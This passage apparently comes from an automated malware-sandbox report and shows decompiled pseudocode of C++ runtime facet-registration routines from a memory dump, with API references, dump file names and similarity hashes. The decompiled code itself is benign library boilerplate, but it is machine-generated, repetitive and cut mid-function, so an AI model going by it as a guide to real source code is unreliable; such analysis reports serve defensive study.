							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1A161C(0x6e286d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E1C66BA(_t374 - 0x14);
								return E6E1E0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E1D13A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t374 - 0x20);
										E6E1E3D74(_t374 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t265, _t349, _t358, 0x14);
										E6E1C6653(_t374 - 0x14, 0);
										_t359 =  *0x6e286ddc;
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1A161C(0x6e286d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E1C66BA(_t374 - 0x14);
											return E6E1E0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E1D1409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t374 - 0x20);
													E6E1E3D74(_t374 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t265, _t350, _t359, 0x14);
													E6E1C6653(_t374 - 0x14, 0);
													_t360 =  *0x6e286de0;
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1A161C(0x6e286d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E1C66BA(_t374 - 0x14);
														return E6E1E0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E1D1471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t374 - 0x20);
																E6E1E3D74(_t374 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t265, _t351, _t360, 0x14);
																E6E1C6653(_t374 - 0x14, 0);
																_t361 =  *0x6e286dfc;
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1A161C(0x6e286da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E1C66BA(_t374 - 0x14);
																	return E6E1E0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E1D14EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t374 - 0x20);
																			E6E1E3D74(_t374 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t265, _t352, _t361, 0x14);
																			E6E1C6653(_t374 - 0x14, 0);
																			_t362 =  *0x6e286dcc;
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1A161C(0x6e286d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E1C66BA(_t374 - 0x14);
																				return E6E1E0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E1D1558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t374 - 0x20);
																						E6E1E3D74(_t374 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t265, _t353, _t362, 0x14);
																						E6E1C6653(_t374 - 0x14, 0);
																						_t363 =  *0x6e286e00;
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1A161C(0x6e286dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E1C66BA(_t374 - 0x14);
																							return E6E1E0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E1D15C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t374 - 0x20);
																									E6E1E3D74(_t374 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t265, _t354, _t363, 0x14);
																									E6E1C6653(_t374 - 0x14, 0);
																									_t364 =  *0x6e286dd0;
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1A161C(0x6e286d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E1C66BA(_t374 - 0x14);
																										return E6E1E0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E1D162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1A1438(_t321);
																												E6E1E3D74(_t374 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e22851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e22c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E1D542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E1E0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E1C6FD3(__eflags, _t355);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e286dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E1C6FD3(__eflags, _t354);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e286e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E1C6FD3(__eflags, _t353);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e286dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E1C6FD3(__eflags, _t352);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e286dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E1C6FD3(__eflags, _t351);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e286de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E1C6FD3(__eflags, _t350);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e286ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E1C6FD3(__eflags, _t349);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e286db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E1C6FD3(__eflags, _t348);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e286dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF806
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF810
int.LIBCPMT ref: 6E1CF827

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF861
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF881
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF89F

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: e98e5b4e3525cf526d995836f28cb326f1890dd94ff6bd13f754d7f166b6ff8a
Instruction ID: 9d1e5caef6308bc1c09561e3f8c731b572e26b420acda9250dbae664451146fc
Opcode Fuzzy Hash: e98e5b4e3525cf526d995836f28cb326f1890dd94ff6bd13f754d7f166b6ff8a
Instruction Fuzzy Hash: DE110A759105298BCF01EBE4C854AFDB77AAF65B14F240809E520EB290DF7899C4E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF41B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t638 - 0x14, 0);
				_t609 =  *0x6e286df0;
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6E1A161C(0x6e286d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6E1C66BA(_t638 - 0x14);
					return E6E1E0075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6E1D1057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t638 - 0x20);
							E6E1E3D74(_t638 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t594, _t609, 0x14);
							E6E1C6653(_t638 - 0x14, 0);
							_t610 =  *0x6e286dc0;
							 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
							 *(_t638 - 0x10) = _t610;
							_t222 = E6E1A161C(0x6e286d74);
							_t461 =  *((intOrPtr*)(_t638 + 8));
							_t595 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t222);
							__eflags = _t595;
							if(_t595 != 0) {
								L12:
								E6E1C66BA(_t638 - 0x14);
								return E6E1E0075(_t595);
							} else {
								__eflags = _t610;
								if(_t610 == 0) {
									_push( *((intOrPtr*)(_t638 + 8)));
									_push(_t638 - 0x10);
									__eflags = E6E1D10BF(_t451, _t461, __edx, _t595, _t610) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t638 - 0x20);
										E6E1E3D74(_t638 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t451, _t595, _t610, 0x14);
										E6E1C6653(_t638 - 0x14, 0);
										_t611 =  *0x6e286df8;
										 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
										 *(_t638 - 0x10) = _t611;
										_t235 = E6E1A161C(0x6e286da4);
										_t468 =  *((intOrPtr*)(_t638 + 8));
										_t596 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t235);
										__eflags = _t596;
										if(_t596 != 0) {
											L19:
											E6E1C66BA(_t638 - 0x14);
											return E6E1E0075(_t596);
										} else {
											__eflags = _t611;
											if(_t611 == 0) {
												_push( *((intOrPtr*)(_t638 + 8)));
												_push(_t638 - 0x10);
												__eflags = E6E1D1127(_t451, _t468, __edx, _t596, _t611) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t638 - 0x20);
													E6E1E3D74(_t638 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t451, _t596, _t611, 0x14);
													E6E1C6653(_t638 - 0x14, 0);
													_t612 =  *0x6e286df4;
													 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
													 *(_t638 - 0x10) = _t612;
													_t248 = E6E1A161C(0x6e286da0);
													_t475 =  *((intOrPtr*)(_t638 + 8));
													_t597 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t248);
													__eflags = _t597;
													if(_t597 != 0) {
														L26:
														E6E1C66BA(_t638 - 0x14);
														return E6E1E0075(_t597);
													} else {
														__eflags = _t612;
														if(_t612 == 0) {
															_push( *((intOrPtr*)(_t638 + 8)));
															_push(_t638 - 0x10);
															__eflags = E6E1D11AB(_t451, _t475, _t592, _t597, _t612) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t638 - 0x20);
																E6E1E3D74(_t638 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t451, _t597, _t612, 0x14);
																E6E1C6653(_t638 - 0x14, 0);
																_t613 =  *0x6e286dc8;
																 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																 *(_t638 - 0x10) = _t613;
																_t261 = E6E1A161C(0x6e286d7c);
																_t482 =  *((intOrPtr*)(_t638 + 8));
																_t598 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t261);
																__eflags = _t598;
																if(_t598 != 0) {
																	L33:
																	E6E1C66BA(_t638 - 0x14);
																	return E6E1E0075(_t598);
																} else {
																	__eflags = _t613;
																	if(_t613 == 0) {
																		_push( *((intOrPtr*)(_t638 + 8)));
																		_push(_t638 - 0x10);
																		__eflags = E6E1D1230(_t451, _t482, _t592, _t598, _t613) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t638 - 0x20);
																			E6E1E3D74(_t638 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t451, _t598, _t613, 0x14);
																			E6E1C6653(_t638 - 0x14, 0);
																			_t614 =  *0x6e286dc4;
																			 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																			 *(_t638 - 0x10) = _t614;
																			_t274 = E6E1A161C(0x6e286d78);
																			_t489 =  *((intOrPtr*)(_t638 + 8));
																			_t599 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t274);
																			__eflags = _t599;
																			if(_t599 != 0) {
																				L40:
																				E6E1C66BA(_t638 - 0x14);
																				return E6E1E0075(_t599);
																			} else {
																				__eflags = _t614;
																				if(_t614 == 0) {
																					_push( *((intOrPtr*)(_t638 + 8)));
																					_push(_t638 - 0x10);
																					__eflags = E6E1D12B4(_t451, _t489, _t592, _t599, _t614) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t638 - 0x20);
																						E6E1E3D74(_t638 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t451, _t599, _t614, 0x14);
																						E6E1C6653(_t638 - 0x14, 0);
																						_t615 =  *0x6e286dd8;
																						 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																						 *(_t638 - 0x10) = _t615;
																						_t287 = E6E1A161C(0x6e286d84);
																						_t496 =  *((intOrPtr*)(_t638 + 8));
																						_t600 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t287);
																						__eflags = _t600;
																						if(_t600 != 0) {
																							L47:
																							E6E1C66BA(_t638 - 0x14);
																							return E6E1E0075(_t600);
																						} else {
																							__eflags = _t615;
																							if(_t615 == 0) {
																								_push( *((intOrPtr*)(_t638 + 8)));
																								_push(_t638 - 0x10);
																								__eflags = E6E1D1339(_t451, _t496, _t592, _t600, _t615) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t638 - 0x20);
																									E6E1E3D74(_t638 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t451, _t600, _t615, 0x14);
																									E6E1C6653(_t638 - 0x14, 0);
																									_t616 =  *0x6e286db0;
																									 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																									 *(_t638 - 0x10) = _t616;
																									_t300 = E6E1A161C(0x6e286d64);
																									_t503 =  *((intOrPtr*)(_t638 + 8));
																									_t601 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t300);
																									__eflags = _t601;
																									if(_t601 != 0) {
																										L54:
																										E6E1C66BA(_t638 - 0x14);
																										return E6E1E0075(_t601);
																									} else {
																										__eflags = _t616;
																										if(_t616 == 0) {
																											_push( *((intOrPtr*)(_t638 + 8)));
																											_push(_t638 - 0x10);
																											__eflags = E6E1D13A1(_t451, _t503, _t592, _t601, _t616) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t638 - 0x20);
																												E6E1E3D74(_t638 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t451, _t601, _t616, 0x14);
																												E6E1C6653(_t638 - 0x14, 0);
																												_t617 =  *0x6e286ddc;
																												 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																												 *(_t638 - 0x10) = _t617;
																												_t313 = E6E1A161C(0x6e286d88);
																												_t510 =  *((intOrPtr*)(_t638 + 8));
																												_t602 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t313);
																												__eflags = _t602;
																												if(_t602 != 0) {
																													L61:
																													E6E1C66BA(_t638 - 0x14);
																													return E6E1E0075(_t602);
																												} else {
																													__eflags = _t617;
																													if(_t617 == 0) {
																														_push( *((intOrPtr*)(_t638 + 8)));
																														_push(_t638 - 0x10);
																														__eflags = E6E1D1409(_t451, _t510, _t592, _t602, _t617) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t638 - 0x20);
																															E6E1E3D74(_t638 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t451, _t602, _t617, 0x14);
																															E6E1C6653(_t638 - 0x14, 0);
																															_t618 =  *0x6e286de0;
																															 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																															 *(_t638 - 0x10) = _t618;
																															_t326 = E6E1A161C(0x6e286d8c);
																															_t517 =  *((intOrPtr*)(_t638 + 8));
																															_t603 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t326);
																															__eflags = _t603;
																															if(_t603 != 0) {
																																L68:
																																E6E1C66BA(_t638 - 0x14);
																																return E6E1E0075(_t603);
																															} else {
																																__eflags = _t618;
																																if(_t618 == 0) {
																																	_push( *((intOrPtr*)(_t638 + 8)));
																																	_push(_t638 - 0x10);
																																	__eflags = E6E1D1471(_t451, _t517, _t592, _t603, _t618) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t638 - 0x20);
																																		E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t451, _t603, _t618, 0x14);
																																		E6E1C6653(_t638 - 0x14, 0);
																																		_t619 =  *0x6e286dfc;
																																		 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																		 *(_t638 - 0x10) = _t619;
																																		_t339 = E6E1A161C(0x6e286da8);
																																		_t524 =  *((intOrPtr*)(_t638 + 8));
																																		_t604 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t339);
																																		__eflags = _t604;
																																		if(_t604 != 0) {
																																			L75:
																																			E6E1C66BA(_t638 - 0x14);
																																			return E6E1E0075(_t604);
																																		} else {
																																			__eflags = _t619;
																																			if(_t619 == 0) {
																																				_push( *((intOrPtr*)(_t638 + 8)));
																																				_push(_t638 - 0x10);
																																				__eflags = E6E1D14EC(_t451, _t524, _t592, _t604, _t619) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t638 - 0x20);
																																					E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t451, _t604, _t619, 0x14);
																																					E6E1C6653(_t638 - 0x14, 0);
																																					_t620 =  *0x6e286dcc;
																																					 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																					 *(_t638 - 0x10) = _t620;
																																					_t352 = E6E1A161C(0x6e286d80);
																																					_t531 =  *((intOrPtr*)(_t638 + 8));
																																					_t605 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t352);
																																					__eflags = _t605;
																																					if(_t605 != 0) {
																																						L82:
																																						E6E1C66BA(_t638 - 0x14);
																																						return E6E1E0075(_t605);
																																					} else {
																																						__eflags = _t620;
																																						if(_t620 == 0) {
																																							_push( *((intOrPtr*)(_t638 + 8)));
																																							_push(_t638 - 0x10);
																																							__eflags = E6E1D1558(_t451, _t531, _t592, _t605, _t620) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t638 - 0x20);
																																								E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t451, _t605, _t620, 0x14);
																																								E6E1C6653(_t638 - 0x14, 0);
																																								_t621 =  *0x6e286e00;
																																								 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																								 *(_t638 - 0x10) = _t621;
																																								_t365 = E6E1A161C(0x6e286dac);
																																								_t538 =  *((intOrPtr*)(_t638 + 8));
																																								_t606 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t365);
																																								__eflags = _t606;
																																								if(_t606 != 0) {
																																									L89:
																																									E6E1C66BA(_t638 - 0x14);
																																									return E6E1E0075(_t606);
																																								} else {
																																									__eflags = _t621;
																																									if(_t621 == 0) {
																																										_push( *((intOrPtr*)(_t638 + 8)));
																																										_push(_t638 - 0x10);
																																										__eflags = E6E1D15C4(_t451, _t538, _t592, _t606, _t621) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t638 - 0x20);
																																											E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t451, _t606, _t621, 0x14);
																																											E6E1C6653(_t638 - 0x14, 0);
																																											_t622 =  *0x6e286dd0;
																																											 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																											 *(_t638 - 0x10) = _t622;
																																											_t378 = E6E1A161C(0x6e286d60);
																																											_t545 =  *((intOrPtr*)(_t638 + 8));
																																											_t607 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t378);
																																											__eflags = _t607;
																																											if(_t607 != 0) {
																																												L96:
																																												E6E1C66BA(_t638 - 0x14);
																																												return E6E1E0075(_t607);
																																											} else {
																																												__eflags = _t622;
																																												if(_t622 == 0) {
																																													_push( *((intOrPtr*)(_t638 + 8)));
																																													_push(_t638 - 0x10);
																																													__eflags = E6E1D162A(_t451, _t545, _t592, _t607, _t622) - 0xffffffff;
																																													if(__eflags == 0) {
																																														_t549 = _t638 - 0x20;
																																														E6E1A1438(_t549);
																																														E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e22851f, _t451, _t607, _t622, 4);
																																														_t623 = _t549;
																																														 *(_t638 - 0x10) = _t623;
																																														 *((intOrPtr*)(_t623 + 4)) =  *((intOrPtr*)(_t638 + 0xc));
																																														_push( *((intOrPtr*)(_t638 + 0x14)));
																																														_t203 = _t638 - 4;
																																														 *_t203 =  *(_t638 - 4) & 0x00000000;
																																														__eflags =  *_t203;
																																														 *_t623 = 0x6e22c0c4;
																																														 *((char*)(_t623 + 0x28)) =  *((intOrPtr*)(_t638 + 0x10));
																																														E6E1D542F(_t451, _t549, _t592, _t607, _t623,  *_t203);
																																														return E6E1E0075(_t623,  *((intOrPtr*)(_t638 + 8)));
																																													} else {
																																														_t607 =  *(_t638 - 0x10);
																																														 *(_t638 - 0x10) = _t607;
																																														 *(_t638 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t607);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t607 + 4))))();
																																														 *0x6e286dd0 = _t607;
																																														goto L96;
																																													}
																																												} else {
																																													_t607 = _t622;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t606 =  *(_t638 - 0x10);
																																											 *(_t638 - 0x10) = _t606;
																																											 *(_t638 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t606);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t606 + 4))))();
																																											 *0x6e286e00 = _t606;
																																											goto L89;
																																										}
																																									} else {
																																										_t606 = _t621;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t605 =  *(_t638 - 0x10);
																																								 *(_t638 - 0x10) = _t605;
																																								 *(_t638 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t605);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t605 + 4))))();
																																								 *0x6e286dcc = _t605;
																																								goto L82;
																																							}
																																						} else {
																																							_t605 = _t620;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t604 =  *(_t638 - 0x10);
																																					 *(_t638 - 0x10) = _t604;
																																					 *(_t638 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t604);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t604 + 4))))();
																																					 *0x6e286dfc = _t604;
																																					goto L75;
																																				}
																																			} else {
																																				_t604 = _t619;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t603 =  *(_t638 - 0x10);
																																		 *(_t638 - 0x10) = _t603;
																																		 *(_t638 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t603);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t603 + 4))))();
																																		 *0x6e286de0 = _t603;
																																		goto L68;
																																	}
																																} else {
																																	_t603 = _t618;
																																	goto L68;
																																}
																															}
																														} else {
																															_t602 =  *(_t638 - 0x10);
																															 *(_t638 - 0x10) = _t602;
																															 *(_t638 - 4) = 1;
																															E6E1C6FD3(__eflags, _t602);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t602 + 4))))();
																															 *0x6e286ddc = _t602;
																															goto L61;
																														}
																													} else {
																														_t602 = _t617;
																														goto L61;
																													}
																												}
																											} else {
																												_t601 =  *(_t638 - 0x10);
